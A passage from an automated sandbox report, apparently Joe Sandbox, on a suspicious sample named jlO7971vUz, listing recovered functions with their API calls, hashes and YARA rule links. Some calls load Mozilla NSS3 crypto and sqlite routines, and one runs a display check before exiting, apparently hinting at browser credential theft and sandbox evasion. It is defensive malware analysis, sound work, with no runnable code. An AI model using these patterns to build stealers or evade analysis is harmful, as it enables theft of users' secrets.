Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: Arena$Util$Alloc_AllocateArena_Value$CriticalEnterFreeInitLockPoolSectionUnlockcalloc
String ID:
API String ID: 2957673229-0
Opcode ID: fde359a11de0bfe4845df7f2d5157b0e79017d69c9f1ce55be8417e26a882dd5
Instruction ID: 4eb09962a8b78bd0bf37fbd60df19007400298890e7ea8a49f9bc9166a1503ba
Opcode Fuzzy Hash: fde359a11de0bfe4845df7f2d5157b0e79017d69c9f1ce55be8417e26a882dd5
Instruction Fuzzy Hash: EE21D4B1A007429BE700CF26DD54B56BBE4BFE5308F15C219E81C87661F7B0E9A5C6D0

Function 6C5A4900 Relevance: 6.1, APIs: 4, Instructions: 63COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE09A,00000000,00000004,6C58C79F,?,?,6C5A5C4A,?), ref: 6C5A4950

Part of subcall function 6C5A8800: TlsGetValue.KERNEL32(?,6C5B085A,00000000,?,6C558369,?), ref: 6C5A8821
Part of subcall function 6C5A8800: TlsGetValue.KERNEL32(?,?,6C5B085A,00000000,?,6C558369,?), ref: 6C5A883D
Part of subcall function 6C5A8800: EnterCriticalSection.KERNEL32(?,?,?,6C5B085A,00000000,?,6C558369,?), ref: 6C5A8856
Part of subcall function 6C5A8800: PR_WaitCondVar.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000013,?), ref: 6C5A8887
Part of subcall function 6C5A8800: PR_Unlock.NSS3(?,?,?,?,6C5B085A,00000000,?,6C558369,?), ref: 6C5A8899

TlsGetValue.KERNEL32(?,?,?), ref: 6C5A496A
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C5A497A
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C5A4989

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: Value$CriticalEnterSectionUnlock$CondErrorWait
String ID:
API String ID: 3904631464-0
Opcode ID: b75c9025896ca44788f2a95e1dbbfdfc267dba2a9af24abc05eebb4ab8d6b0d6
Instruction ID: c46720582bf4c99f9de3100818dd3dd3ea294e5f15ec32a8644ef00dfe891a4b
Opcode Fuzzy Hash: b75c9025896ca44788f2a95e1dbbfdfc267dba2a9af24abc05eebb4ab8d6b0d6
Instruction Fuzzy Hash: 07112971A001019FEB009FE7DC8191EB3B8FF46358F141835D94587B11EF21E826869E

Function 6C5C08D0 Relevance: 6.1, APIs: 4, Instructions: 62memoryCOMMON

Download Yara Rule

APIs

SECOID_FindOIDByTag_Util.NSS3(?,?,?,?,?,6C5C09B3,0000001A,?), ref: 6C5C08E9

Part of subcall function 6C5B0840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C5B08B4

SECITEM_CopyItem_Util.NSS3(?,?,00000000), ref: 6C5C08FD

Part of subcall function 6C5AFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C5A8D2D,?,00000000,?), ref: 6C5AFB85
Part of subcall function 6C5AFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C5AFBB1

SECITEM_AllocItem_Util.NSS3(?,00000000,00000001), ref: 6C5C0939
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C5C0953

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: Util$ErrorItem_$AllocAlloc_ArenaCopyFindTag_memcpy
String ID:
API String ID: 2572351645-0
Opcode ID: 2e99b12f1c9af86e3f260138aaee893669f473c170dc6a84dddc8e352a0eca88
Instruction ID: 46c2078ff664b274a7c2ae5a3d7f3cc52df8ce6fd67258bfdbaaf215c3057e21
Opcode Fuzzy Hash: 2e99b12f1c9af86e3f260138aaee893669f473c170dc6a84dddc8e352a0eca88
Instruction Fuzzy Hash: 7201C4F170164A6BFB149AB69C10B6737989FC421CF10443EFD1AC7A41EB31E814CB96

Function 6C5DEDB0 Relevance: 6.1, APIs: 4, Instructions: 62memoryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE013,00000000,00000000,00000000,6C5C7FFA,?,6C5C9767,?,8B7874C0,0000A48E), ref: 6C5DEDD4
realloc.MOZGLUE(C7C1920F,?,00000000,00000000,6C5C7FFA,?,6C5C9767,?,8B7874C0,0000A48E), ref: 6C5DEDFD
PORT_Alloc_Util.NSS3(?,00000000,00000000,6C5C7FFA,?,6C5C9767,?,8B7874C0,0000A48E), ref: 6C5DEE14

Part of subcall function 6C5B0BE0: malloc.MOZGLUE(6C5A8D2D,?,00000000,?), ref: 6C5B0BF8
Part of subcall function 6C5B0BE0: TlsGetValue.KERNEL32(6C5A8D2D,?,00000000,?), ref: 6C5B0C15

memcpy.VCRUNTIME140(?,?,6C5C9767,00000000,00000000,6C5C7FFA,?,6C5C9767,?,8B7874C0,0000A48E), ref: 6C5DEE33

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: Alloc_ErrorUtilValuemallocmemcpyrealloc
String ID:
API String ID: 3903481028-0
Opcode ID: 5b7ea51e180e560b243dd8f3d4c35d95fda3e12e563c0b146d79df39ef497354
Instruction ID: a78c5f6680d6ed47d98571574a9cb5fca34958dbd189d8c6d249212ed18c68f1
Opcode Fuzzy Hash: 5b7ea51e180e560b243dd8f3d4c35d95fda3e12e563c0b146d79df39ef497354
Instruction Fuzzy Hash: 5A11C6B1A00707ABEB109E69DC84B06F3A8FF0035DF224535E91986A00E771F864C7E9

Function 6C5A49C0 Relevance: 6.1, APIs: 4, Instructions: 61COMMON

Download Yara Rule

APIs

Part of subcall function 6C5A8800: TlsGetValue.KERNEL32(?,6C5B085A,00000000,?,6C558369,?), ref: 6C5A8821
Part of subcall function 6C5A8800: TlsGetValue.KERNEL32(?,?,6C5B085A,00000000,?,6C558369,?), ref: 6C5A883D
Part of subcall function 6C5A8800: EnterCriticalSection.KERNEL32(?,?,?,6C5B085A,00000000,?,6C558369,?), ref: 6C5A8856
Part of subcall function 6C5A8800: PR_WaitCondVar.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000013,?), ref: 6C5A8887
Part of subcall function 6C5A8800: PR_Unlock.NSS3(?,?,?,?,6C5B085A,00000000,?,6C558369,?), ref: 6C5A8899

PR_SetError.NSS3 ref: 6C5A4A10
TlsGetValue.KERNEL32(6C59781D,?,6C58BD28,00CD52E8,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C5A4A24
EnterCriticalSection.KERNEL32(?,?,?,6C58BD28,00CD52E8), ref: 6C5A4A39
PR_Unlock.NSS3(?,?,?,?,6C58BD28,00CD52E8), ref: 6C5A4A4E

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: Value$CriticalEnterSectionUnlock$CondErrorWait
String ID:
API String ID: 3904631464-0
Opcode ID: 52756e1365beaf88d4331d975a088d2b10562c6a16b839e93ece0d1b3b4e9aa3
Instruction ID: a46229b8bb7c3e9c2fc09f47b30373758ddfff52c303ee629426a7c4ea0fbe77
Opcode Fuzzy Hash: 52756e1365beaf88d4331d975a088d2b10562c6a16b839e93ece0d1b3b4e9aa3
Instruction Fuzzy Hash: 4C212E75A04701CFDB00AFBAC88556EB7F4FF45358F015929D8859BB01EB30E855CB9A

Function 6C578DD0 Relevance: 6.1, APIs: 4, Instructions: 53COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C578DE7
EnterCriticalSection.KERNEL32 ref: 6C578DFC
PR_Unlock.NSS3 ref: 6C578E2D
PR_SetError.NSS3 ref: 6C578E49

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: CriticalEnterErrorSectionUnlockValue
String ID:
API String ID: 284873373-0
Opcode ID: 6e4f772e35d7a323be60c05f66f8a6c4fb201abb2d19c9ec94c53ec628174856
Instruction ID: 18b21156dfb41805917a0e9fe58198ed9920eb177dc34b1b985146d0c5d6cbbc
Opcode Fuzzy Hash: 6e4f772e35d7a323be60c05f66f8a6c4fb201abb2d19c9ec94c53ec628174856
Instruction Fuzzy Hash: F7119E71605A019FD700AF79D8882AABBF4FF45354F01492ADC89D7B00EB30E8A4CBD6

Function 017F5850 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,017FE7A8,00000000,?), ref: 017F5880
HeapAlloc.KERNEL32(00000000,?,?,?,?,017FE7A8,00000000,?), ref: 017F5887
GetLocalTime.KERNEL32(?,?,?,?,?,017FE7A8,00000000,?), ref: 017F5894
wsprintfA.USER32 ref: 017F58C3

Memory Dump Source

Source File: 00000000.00000002.2244768621.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true

Associated: 00000000.00000002.2244768621.000000000182E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000188A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000192D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A05000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A17000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17e0000_jlO7971vUz.jbxd

Yara matches

Similarity

API ID: Heap$AllocLocalProcessTimewsprintf
String ID:
API String ID: 1243822799-0
Opcode ID: f385523e7ccf0512e73e51c8e9c119b133dd1f83682cb70794485738cd7f6acc
Instruction ID: fc90c842ea56d7066cd06421857d52a10c5462b9875cbe550683f36d068d1a65
Opcode Fuzzy Hash: f385523e7ccf0512e73e51c8e9c119b133dd1f83682cb70794485738cd7f6acc
Instruction Fuzzy Hash: C6113CB2D44218ABCB24DFC9D945BBFBBB8FB4CB11F00411AF605A2280D3795951CB70

Function 6C5FAC70 Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

PR_DestroyMonitor.NSS3(000A34B6,00000000,00000678,?,6C5E5F17,?,?,?,?,?,?,?,?,6C5EAAD4), ref: 6C5FAC94
PK11_FreeSymKey.NSS3(08C483FF,00000000,00000678,?,6C5E5F17,?,?,?,?,?,?,?,?,6C5EAAD4), ref: 6C5FACA6
free.MOZGLUE(20868D04,?,?,?,?,?,?,?,?,6C5EAAD4), ref: 6C5FACC0
free.MOZGLUE(04C48300,?,?,?,?,?,?,?,?,6C5EAAD4), ref: 6C5FACDB

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: free$DestroyFreeK11_Monitor
String ID:
API String ID: 3989322779-0
Opcode ID: bf992b7d9099d22967c57ee2215b015ef04d48a252a7c30135ba685f6150e5e7
Instruction ID: 207020bf96bafd70bdd32a0ba23143cef5e346677c4704f03d22da4d9e907ad0
Opcode Fuzzy Hash: bf992b7d9099d22967c57ee2215b015ef04d48a252a7c30135ba685f6150e5e7
Instruction Fuzzy Hash: 90018CB1701B029BE710DF6AED48757B7E8BF10759B004839E86AC3A00E732F415CB91

Function 6C5A88E0 Relevance: 6.0, APIs: 4, Instructions: 47COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,?,?,6C5B08AA,?), ref: 6C5A88F6
EnterCriticalSection.KERNEL32(?,?,?,?,6C5B08AA,?), ref: 6C5A890B
PR_NotifyCondVar.NSS3(?,?,?,?,?,6C5B08AA,?), ref: 6C5A8936
PR_Unlock.NSS3(?,?,?,?,?,6C5B08AA,?), ref: 6C5A8940

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: CondCriticalEnterNotifySectionUnlockValue
String ID:
API String ID: 959714679-0
Opcode ID: 833e9188616c42c6a69e34f1ad4cd2650b01a5bbe356443830eabbfdd0c789de
Instruction ID: d1b8af019ff91578e6dc28f84b8ffbc840f0801f2110af6070d383015e76c230
Opcode Fuzzy Hash: 833e9188616c42c6a69e34f1ad4cd2650b01a5bbe356443830eabbfdd0c789de
Instruction Fuzzy Hash: 22016174604645DFD700AFBAC884659B7F4FF45398F014A2AD88987B00E730E895CBD7

Function 6C5E0840 Relevance: 6.0, APIs: 4, Instructions: 45COMMON

Download Yara Rule

APIs

PR_CallOnce.NSS3(6C6B2F88,6C5E0660,00000020,00000000,?,?,6C5E2C3D,?,00000000,00000000,?,6C5E2A28,00000060,00000001), ref: 6C5E0860

Part of subcall function 6C4D4C70: TlsGetValue.KERNEL32(?,?,?,6C4D3921,6C6B14E4,6C61CC70), ref: 6C4D4C97
Part of subcall function 6C4D4C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C4D3921,6C6B14E4,6C61CC70), ref: 6C4D4CB0
Part of subcall function 6C4D4C70: PR_Unlock.NSS3(?,?,?,?,?,6C4D3921,6C6B14E4,6C61CC70), ref: 6C4D4CC9

TlsGetValue.KERNEL32(00000020,00000000,?,?,6C5E2C3D,?,00000000,00000000,?,6C5E2A28,00000060,00000001), ref: 6C5E0874
EnterCriticalSection.KERNEL32(00000001), ref: 6C5E0884
PR_Unlock.NSS3 ref: 6C5E08A3

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: CriticalEnterSectionUnlockValue$CallOnce
String ID:
API String ID: 2502187247-0
Opcode ID: 92a20743b5441d5c40d78c2d0a75a45f6ebb3a1e371355f18a2a0f9691f42184
Instruction ID: 2fe82ff33b883a8baff6ad6e18f05c2c7662a7a171cdcf03ed3efcc2858adaa2
Opcode Fuzzy Hash: 92a20743b5441d5c40d78c2d0a75a45f6ebb3a1e371355f18a2a0f9691f42184
Instruction Fuzzy Hash: FA017032E04240BBEB002F67EC84A557778DBDA358F040562EC0851602EF22D4649BE5

Function 017F71F0 Relevance: 6.0, APIs: 4, Instructions: 39fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(017F2859,80000000,00000003,00000000,00000003,00000080,00000000,?,017F2859,?), ref: 017F720C
GetFileSizeEx.KERNEL32(000000FF,017F2859), ref: 017F7229
CloseHandle.KERNEL32(000000FF), ref: 017F7237

Memory Dump Source

Source File: 00000000.00000002.2244768621.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true

Associated: 00000000.00000002.2244768621.000000000182E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000188A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000192D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A05000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A17000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17e0000_jlO7971vUz.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleSize
String ID:
API String ID: 1378416451-0
Opcode ID: ec23288e36aa434bf795e7619a510453c94b06ae3b88eac69a16a29cfd0400b5
Instruction ID: 9f6a6a93a2d223a268d1c21e5f5bd633e0b6a4422efd16527aa81ab3edd2d6c5
Opcode Fuzzy Hash: ec23288e36aa434bf795e7619a510453c94b06ae3b88eac69a16a29cfd0400b5
Instruction Fuzzy Hash: 92F0A479E14204BBDB25DFF5DC49F5EB779AB44300F10C158F655A7284D6709A028F40

Function 6C66CC50 Relevance: 6.0, APIs: 4, Instructions: 29COMMON

Download Yara Rule

APIs

DeleteCriticalSection.KERNEL32(?), ref: 6C66CC61
free.MOZGLUE ref: 6C66CC6E
DeleteCriticalSection.KERNEL32(?), ref: 6C66CC80
free.MOZGLUE(?), ref: 6C66CC87

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: CriticalDeleteSectionfree
String ID:
API String ID: 2988086103-0
Opcode ID: 86d0e3be4d7d580f4b4d2b25b2db1a6ad2b70bd5623703f6449417e9cb4c6fe4
Instruction ID: bdda9736705d8ec9a4d8a8a5d1d62a8a9d7dff2e81851d36cc8dfbef75a15e85
Opcode Fuzzy Hash: 86d0e3be4d7d580f4b4d2b25b2db1a6ad2b70bd5623703f6449417e9cb4c6fe4
Instruction Fuzzy Hash: 07E03076700609ABCB10EFA9DC84C8A77ACEE492707150525E692C3700D233F905CBA5

Function 017E1190 Relevance: 6.0, APIs: 4, Instructions: 26COMMON

Download Yara Rule

APIs

CreateDCA.GDI32(013B09D8,00000000,00000000,00000000), ref: 017E11A2
GetDeviceCaps.GDI32(?,0000000A), ref: 017E11B1
ReleaseDC.USER32(00000000,?), ref: 017E11C0
ExitProcess.KERNEL32 ref: 017E11D1

Memory Dump Source

Source File: 00000000.00000002.2244768621.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true

Associated: 00000000.00000002.2244768621.000000000182E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000188A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000192D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A05000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A17000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17e0000_jlO7971vUz.jbxd

Yara matches

Similarity

API ID: CapsCreateDeviceExitProcessRelease
String ID:
API String ID: 272768826-0
Opcode ID: 52ac628208e78face31167ef1347f226e2ab5f372f1d124784ad90763246d0a0
Instruction ID: 9a29f250847f69e999f9e5abf44f7f4d59589a6a925fa4740b94817357d79947
Opcode Fuzzy Hash: 52ac628208e78face31167ef1347f226e2ab5f372f1d124784ad90763246d0a0
Instruction Fuzzy Hash: 41F0E578E40304BFEB119FE0D84EB6D7BF4EB48706F108158FA055A2C4D67555578F51

Function 6C5A4D10 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 106COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE001,00000000), ref: 6C5A4D57
PR_snprintf.NSS3(?,00000008,%d.%d,?,?), ref: 6C5A4DE6

Strings

%d.%d, xrefs: 6C5A4DDE

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: ErrorR_snprintf
String ID: %d.%d
API String ID: 2298970422-3954714993
Opcode ID: 9194dd918a7f6e36d82695e422c9191f826192ed586f6efd8419e2fde07e2c94
Instruction ID: ce52095b049495bc6166b4cd1fa5c2267cc491418aad691f1935ae05789455fb
Opcode Fuzzy Hash: 9194dd918a7f6e36d82695e422c9191f826192ed586f6efd8419e2fde07e2c94
Instruction Fuzzy Hash: 5731EAB2D042196BEB109BE29C01BFF7768EF81308F050429ED159B781EB309906CBA6

Function 6C640900 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

sqlite3_value_text.NSS3(?), ref: 6C640917
sqlite3_value_text.NSS3(?), ref: 6C640923

Part of subcall function 6C5013C0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,6C4D2352,?,00000000,?,?), ref: 6C501413
Part of subcall function 6C5013C0: memcpy.VCRUNTIME140(00000000,R#Ml,00000002,?,?,?,?,6C4D2352,?,00000000,?,?), ref: 6C5014C0

Strings

error in %s %s%s%s: %s, xrefs: 6C640944

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: sqlite3_value_text$memcpystrlen
String ID: error in %s %s%s%s: %s
API String ID: 1937290486-1007276823
Opcode ID: 93d97f734b1af82b9e8b8074b6fedcb1d24300e3e517b5ad7004d0bcd303c4d7
Instruction ID: 415591af00bd8f1b93959583e4d6c693bfcefedcfaac0225d71d62e50c710880
Opcode Fuzzy Hash: 93d97f734b1af82b9e8b8074b6fedcb1d24300e3e517b5ad7004d0bcd303c4d7
Instruction Fuzzy Hash: 350108B6E001459BD7009E58EC419BBB7B5EFC0359F148428ED585B715F732AD1487A2

Function 6C5C4CF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

SECOID_FindOIDByTag_Util.NSS3('8\l,00000000,00000000,?,?,6C5C3827,?,00000000), ref: 6C5C4D0A

Part of subcall function 6C5B0840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C5B08B4

SECITEM_ItemsAreEqual_Util.NSS3(00000000,00000000,00000000), ref: 6C5C4D22

